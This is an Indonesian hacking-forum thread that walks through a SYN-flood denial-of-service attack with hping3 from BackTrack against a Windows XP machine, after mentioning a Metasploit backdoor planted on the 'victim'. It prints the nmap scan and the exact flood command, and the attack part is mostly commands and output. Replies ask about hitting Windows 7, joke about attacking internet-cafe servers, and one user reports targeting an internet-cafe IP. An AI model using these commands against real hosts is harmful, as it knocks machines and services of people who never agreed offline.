(share)dos attack use hping3
#1
okeh pemirsa kembali lagi bersama saya faisal aka xsan-lahci yg apa adanya wakakak kali ini ane mau berbagi cara gimana cara melakukan dos atau Denial Of Service dengan menggunakan hping3,secara default hping3 sudah ada di dlm tools backtrack 5R2 posisinya ada di

Application > Backtrack > Stress Testing > Network Stress Testing > hping3

okeh peralatan tempur ane yaitu

virtualbox
backtrack 5R2
Hping3
Metasploit

Target saya
windows xp yg katanya proffesional wakakak dengan RAM 1 gb
processor intel core 2 duo
VGA nvdia GEFORCE (ga tau seri apaan)

ok langsung aja deh buka msfconsole
terus bikin backdoor untuk di tanam di PC korban caranya lengkap ada disini

ane anggap backdoor udah di execution alias di jalanin ama korban oke

next kita ping ke ip korban kl ngereplay berarti semua lancar kaya gini
[Image: 395814_262931647155603_1232445756_n.jpg]

langsung buka console lagi deh ketik hping3 -h
Code:
xsan-lahci@ibt:~# hping3 -h
usage: hping host [options]
  -h  --help      show this help
  -v  --version   show version
  -c  --count     packet count
  -i  --interval  wait (uX for X microseconds, for example -i u1000)
      --fast      alias for -i u10000 (10 packets for second)
      --faster    alias for -i u1000 (100 packets for second)
      --flood       sent packets as fast as possible. Don't show replies.
  -n  --numeric   numeric output
  -q  --quiet     quiet
  -I  --interface interface name (otherwise default routing interface)
  -V  --verbose   verbose mode
  -D  --debug     debugging info
  -z  --bind      bind ctrl+z to ttl           (default to dst port)
  -Z  --unbind    unbind ctrl+z
      --beep      beep for every matching packet received
Mode
  default mode     TCP
  -0  --rawip      RAW IP mode
  -1  --icmp       ICMP mode
  -2  --udp        UDP mode
  -8  --scan       SCAN mode.
                   Example: hping --scan 1-30,70-90 -S www.target.host
  -9  --listen     listen mode
IP
  -a  --spoof      spoof source address
  --rand-dest      random destionation address mode. see the man.
  --rand-source    random source address mode. see the man.
  -t  --ttl        ttl (default 64)
  -N  --id         id (default random)
  -W  --winid      use win* id byte ordering
  -r  --rel        relativize id field          (to estimate host traffic)
  -f  --frag       split packets in more frag.  (may pass weak acl)
  -x  --morefrag   set more fragments flag
  -y  --dontfrag   set dont fragment flag
  -g  --fragoff    set the fragment offset
  -m  --mtu        set virtual mtu, implies --frag if packet size > mtu
  -o  --tos        type of service (default 0x00), try --tos help
  -G  --rroute     includes RECORD_ROUTE option and display the route buffer
  --lsrr           loose source routing and record route
  --ssrr           strict source routing and record route
  -H  --ipproto    set the IP protocol field, only in RAW IP mode
ICMP
  -C  --icmptype   icmp type (default echo request)
  -K  --icmpcode   icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)
      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help  display help for others icmp options
UDP/TCP
  -s  --baseport   base source port             (default random)
  -p  --destport   [+][+]<port> destination port(default 0) ctrl+z inc/dec
  -k  --keep       keep still source port
  -w  --win        winsize (default 64)
  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
  -Q  --seqnum     shows only tcp sequence number
  -b  --badcksum   (try to) send packets with a bad IP checksum
                   many systems will fix the IP checksum sending the packet
                   so you'll get bad UDP/TCP checksum instead.
  -M  --setseq     set TCP sequence number
  -L  --setack     set TCP ack
  -F  --fin        set FIN flag
  -S  --syn        set SYN flag
  -R  --rst        set RST flag
  -P  --push       set PUSH flag
  -A  --ack        set ACK flag
  -U  --urg        set URG flag
  -X  --xmas       set X unused flag (0x40)
  -Y  --ymas       set Y unused flag (0x80)
  --tcpexitcode    use last tcp->th_flags as exit code
  --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
Common
  -d  --data       data size                    (default is 0)
  -E  --file       data from file
  -e  --sign       add 'signature'
  -j  --dump       dump packets in hex
  -J  --print      dump printable characters
  -B  --safe       enable 'safe' protocol
  -u  --end        tell you when --file reached EOF and prevent rewind
  -T  --traceroute traceroute mode              (implies --bind and --ttl 1)
  --tr-stop        Exit when receive the first not ICMP in traceroute mode
  --tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop
  --tr-no-rtt        Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
  --apd-send  Send the packet described with APD (see docs/APD.txt)

okeh pertama cb di nmap dl bro
Code:
xsan-lahci@ibt:~# nmap -sV 192.168.1.101

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-08-04 13:40 WIT
Nmap scan report for 192.168.1.101
Host is up (0.00072s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:F8:D5:8B (Cadmus Computer Systems)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.96 seconds

okeh kl udh cb di jalanin deh hping3 kaya gini

xsan-lahci@ibt:~# hping3 ­-i u100 ­-S ­-p 443 192.168.1.101

keterangan
-i (-- interval ) = dalam satuan mikrodetik
-S ( --SYN mode ) = mengeset flag SYN
-p = port target
ip target = 192.168.1.101


ini adalah efek dr serangan menggunakan hping3 td

[Image: 557515_262955117153256_638411042_n.jpg]

jangan lama-lama kesian hehe ketika saya tekan ctrl+c atau menghentikan serangan usage PC korban menjadi normal lg

[Image: 530093_262934533821981_1389014648_n.jpg]

note:
coba anda bayangkan jika 3 komputer menyerang 1 PC admin di warnet pasti anda dosa hahaha tread ini saya buat hanya untuk pembelajaran saja

okeh segitu dl yah silahkan di explore lagi cara penggunakan hping3 dan tools yg lainnya

pesan singkat terakhir dr si ganteng wakakak jangan pernah melakukan stress testing jika belum melakukan information gathering


Angel

#2
(08-04-2012, 04:28 PM)xsan-lahci Wrote: okeh pemirsa kembali lagi bersama saya faisal aka xsan-lahci yg apa adanya wakakak kali ini ane mau berbagi cara gimana cara melakukan dos atau Denial Of Service dengan menggunakan hping3,secara default hping3 sudah ada di dlm tools backtrack 5R2 posisinya ada di

Application > Backtrack > Stress Testing > Network Stress Testing > hping3

okeh peralatan tempur ane yaitu

virtualbox
backtrack 5R2
Hping3
Metasploit

Target saya
windows xp yg katanya proffesional wakakak dengan RAM 1 gb
processor intel core 2 duo
VGA nvdia GEFORCE (ga tau seri apaan)

ok langsung aja deh buka msfconsole
terus bikin backdoor untuk di tanam di PC korban caranya lengkap ada disini

ane anggap backdoor udah di execution alias di jalanin ama korban oke

next kita ping ke ip korban kl ngereplay berarti semua lancar kaya gini
[Image: 395814_262931647155603_1232445756_n.jpg]

langsung buka console lagi deh ketik hping3 -h
Code:
xsan-lahci@ibt:~# hping3 -h
usage: hping host [options]
  -h  --help      show this help
  -v  --version   show version
  -c  --count     packet count
  -i  --interval  wait (uX for X microseconds, for example -i u1000)
      --fast      alias for -i u10000 (10 packets for second)
      --faster    alias for -i u1000 (100 packets for second)
      --flood       sent packets as fast as possible. Don't show replies.
  -n  --numeric   numeric output
  -q  --quiet     quiet
  -I  --interface interface name (otherwise default routing interface)
  -V  --verbose   verbose mode
  -D  --debug     debugging info
  -z  --bind      bind ctrl+z to ttl           (default to dst port)
  -Z  --unbind    unbind ctrl+z
      --beep      beep for every matching packet received
Mode
  default mode     TCP
  -0  --rawip      RAW IP mode
  -1  --icmp       ICMP mode
  -2  --udp        UDP mode
  -8  --scan       SCAN mode.
                   Example: hping --scan 1-30,70-90 -S www.target.host
  -9  --listen     listen mode
IP
  -a  --spoof      spoof source address
  --rand-dest      random destionation address mode. see the man.
  --rand-source    random source address mode. see the man.
  -t  --ttl        ttl (default 64)
  -N  --id         id (default random)
  -W  --winid      use win* id byte ordering
  -r  --rel        relativize id field          (to estimate host traffic)
  -f  --frag       split packets in more frag.  (may pass weak acl)
  -x  --morefrag   set more fragments flag
  -y  --dontfrag   set dont fragment flag
  -g  --fragoff    set the fragment offset
  -m  --mtu        set virtual mtu, implies --frag if packet size > mtu
  -o  --tos        type of service (default 0x00), try --tos help
  -G  --rroute     includes RECORD_ROUTE option and display the route buffer
  --lsrr           loose source routing and record route
  --ssrr           strict source routing and record route
  -H  --ipproto    set the IP protocol field, only in RAW IP mode
ICMP
  -C  --icmptype   icmp type (default echo request)
  -K  --icmpcode   icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)
      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help  display help for others icmp options
UDP/TCP
  -s  --baseport   base source port             (default random)
  -p  --destport   [+][+]<port> destination port(default 0) ctrl+z inc/dec
  -k  --keep       keep still source port
  -w  --win        winsize (default 64)
  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
  -Q  --seqnum     shows only tcp sequence number
  -b  --badcksum   (try to) send packets with a bad IP checksum
                   many systems will fix the IP checksum sending the packet
                   so you'll get bad UDP/TCP checksum instead.
  -M  --setseq     set TCP sequence number
  -L  --setack     set TCP ack
  -F  --fin        set FIN flag
  -S  --syn        set SYN flag
  -R  --rst        set RST flag
  -P  --push       set PUSH flag
  -A  --ack        set ACK flag
  -U  --urg        set URG flag
  -X  --xmas       set X unused flag (0x40)
  -Y  --ymas       set Y unused flag (0x80)
  --tcpexitcode    use last tcp->th_flags as exit code
  --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
Common
  -d  --data       data size                    (default is 0)
  -E  --file       data from file
  -e  --sign       add 'signature'
  -j  --dump       dump packets in hex
  -J  --print      dump printable characters
  -B  --safe       enable 'safe' protocol
  -u  --end        tell you when --file reached EOF and prevent rewind
  -T  --traceroute traceroute mode              (implies --bind and --ttl 1)
  --tr-stop        Exit when receive the first not ICMP in traceroute mode
  --tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop
  --tr-no-rtt        Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
  --apd-send  Send the packet described with APD (see docs/APD.txt)

okeh pertama cb di nmap dl bro
Code:
xsan-lahci@ibt:~# nmap -sV 192.168.1.101

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-08-04 13:40 WIT
Nmap scan report for 192.168.1.101
Host is up (0.00072s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:F8:D5:8B (Cadmus Computer Systems)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.96 seconds

okeh kl udh cb di jalanin deh hping3 kaya gini

xsan-lahci@ibt:~# hping3 ­-i u100 ­-S ­-p 443 192.168.1.101

keterangan
-i (-- interval ) = dalam satuan mikrodetik
-S ( --SYN mode ) = mengeset flag SYN
-p = port target
ip target = 192.168.1.101


ini adalah efek dr serangan menggunakan hping3 td

[Image: 557515_262955117153256_638411042_n.jpg]

jangan lama-lama kesian hehe ketika saya tekan ctrl+c atau menghentikan serangan usage PC korban menjadi normal lg

[Image: 530093_262934533821981_1389014648_n.jpg]

note:
coba anda bayangkan jika 3 komputer menyerang 1 PC admin di warnet pasti anda dosa hahaha tread ini saya buat hanya untuk pembelajaran saja

okeh segitu dl yah silahkan di explore lagi cara penggunakan hping3 dan tools yg lainnya

pesan singkat terakhir dr si ganteng wakakak jangan pernah melakukan stress testing jika belum melakukan information gathering


Angel

om ,kalo untuk nyerang win 7 bisa tuh om Big Grin
power of the spirit BackTrack

#3
-1 dr ane kerna udah berhasil wkkwkwk Smile
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#4
ini bisa untuk menyerang semua os bahkan pernah di uji coba untuk menyerang MAC OS bro ketika training COBS lalu tentunya dengan 10 laptop melawan 1 laptop hahaha karena hardware dr MAC sangat bagus jadi butuh peralatan extra kl mau nekat nyerangnya hehehe

#5
asal jangan buat nyerang server warnet yak #kecualiygjagagalak Big Grin
+1 dari ane Smile

#6
wakakak ga om , Smile makasih om ikons

#7
itu IPnya shared/static ya om? kalo misal kita nembaknya pake wireless sama gak?
[Image: 33529117274.jpg]

#8
itu saya pake wifi kok bro dengan ip dynamic

#9
gw dapet Ip warnet nh ^ ^
tapi ane masih kurang mudeng

[Image: k9jgio.png]

ane smang pngerti Ping doank jdi ane ktik
root@IBTeam:~# ping 192.168.5.30
PING 192.168.5.30 (192.168.5.30) 56(84) bytes of data.

tpi malah satu doank kya gtu yg kluar Sad
Klik Here

Clound@IBTeam:~#
EMail Me : [email protected]

#10
hah kok ping? hping bro tools flood di backtrack






Users browsing this thread: 1 Guest(s)